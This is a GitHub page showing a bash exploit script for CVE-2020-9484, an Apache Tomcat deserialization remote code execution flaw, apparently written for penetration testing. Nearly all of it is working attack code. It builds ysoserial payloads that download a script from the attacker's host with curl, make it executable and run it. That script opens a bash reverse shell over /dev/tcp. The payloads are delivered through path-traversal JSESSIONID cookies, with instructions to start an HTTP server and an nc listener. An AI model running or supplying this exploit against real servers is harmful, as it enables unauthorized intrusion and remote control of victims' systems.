forked from PenTestical/CVE-2020-9484
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2020-9484.sh
121 lines (104 loc) · 4.94 KB
/
CVE-2020-9484.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#!/bin/bash
# Exploit Title: Apache Tomcat RCE by deserialization
# Exploit Author: Pentestical (@ptestical)
# Date: 31.12.2020
# CVE-ID: CVE-2020-9484
# Version: Apache Tomcat 9.0.27
# Tested on: Kali Linux 2020.4
# Remote Code Execution by Deserialization
# your attacker IP, set to your own IP address
remote_ip="10.10.15.108" # change this
# optional:
port=4444
target_ip="$1"
target_port=8080 # default port
# print banner
banner(){
cat <<"EOF"
____ ____________ __
/ __ \/ ____/ ____/________ _/ /_
/ /_/ / / / __/ / ___/ __ `/ __/
/ _, _/ /___/ /___/ /__/ /_/ / /_
/_/ |||\____/_____/||||/\__,_/\__/ __ __ _ __
/ /_ __ __ / __ \___ ____ / /____ _____/ /_(_)________ _/ /
/ __ \/ / / / / /_/ / _ \/ __ \/ __/ _ \/ ___/ __/ / ___/ __ `/ /
/ /_/ / /_/ / / ____/ __/ / / / /_/ __(__ ) /_/ / /__/ /_/ / /
/_.___/\__, / /_/ \___/_/ /_/\__/\___/____/\__/_/\___/\__,_/_/
/____/
EOF
}
if [ -z "$1" ] || [ "$1" = "--help" ] || [ "$1" = "-h" ]; then
echo ""
echo "$(tput setaf 3;tput bold)usage: ./CVE-2020-9484.sh target-ip"
echo ""
echo "$(tput setaf 4;tput bold)Please start a web listener in /tmp folder:"
echo "$(tput setaf 3;tput bold)python3 -m http.server 80"
echo ""
echo "$(tput setaf 4;tput bold)and start your netcat listener at port 4444:"
echo "$(tput setaf 3;tput bold)nc -nvlp 4444"
exit
fi
banner
# look for ysoserial file on your attacker system
# check out install.txt file for instructions how to install ysoserial
find_ysoserial_on_system(){
echo "$(tput setaf 6;tput bold)[+] Checking if you have installed ysoserial.."
sleep 1
ysoserial_file=$(find / -name "ysoserial-master.jar" -type f 2>/dev/null)
if [ -z "$ysoserial_file" ]; then
echo "$(tput setaf 1;tput bold)You need ysoserial-master.jar in order to use this script!"
echo "$(tput setaf 1;tput bold)Please make sure to follow the install.txt guide!"
echo "$(tput setaf 1;tput bold)Quitting.."
exit
fi
echo "$(tput setaf 5;tput bold)[+] Found ysoserial-master.jar!"
}
# creating payload files using ysoserial
create_payload_files(){
echo "$(tput setaf 6;tput bold)[+] Trying to create payload files.."
sleep 1
echo "$(tput setaf 6;tput bold)[+] Creating payload.sh file.."
rm -rf payload.sh
echo "#!/usr/bin/bash" >> payload.sh
echo "bash -c 'bash -i >& /dev/tcp/$remote_ip/$port 0>&1'" >> payload.sh
sleep 1
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create first ysoserial payload file"
sleep 1
java -jar $ysoserial_file CommonsCollections2 'curl http://$remote_ip/payload.sh -o /tmp/payload.sh' > downloadPayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create second ysoserial payload file"
sleep 1
java -jar $ysoserial_file CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create last ysoserial payload file"
sleep 1
java -jar $ysoserial_file CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
sleep 1
echo "$(tput setaf 2;tput bold)----------------------------------------------------------------"
echo "$(tput setaf 4;tput bold)[+] Succesfully created all files!"
echo "$(tput setaf 2;tput bold)----------------------------------------------------------------"
sleep 1
}
#get a reverse shell
get_reverse_shell(){
echo "[+] Trying to get a reverse shell.."
echo "[+] Make sure to have netcat and python weblistener in current folder running.."
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload'
sleep 1
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload'
sleep 1
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/executePayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/executePayload'
echo ""
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo ""
echo "$(tput setaf 4;tput bold)[+] If you don't have a reverse shell, try to run it again!"
}
# start RCE exploit
find_ysoserial_on_system
create_payload_files
get_reverse_shell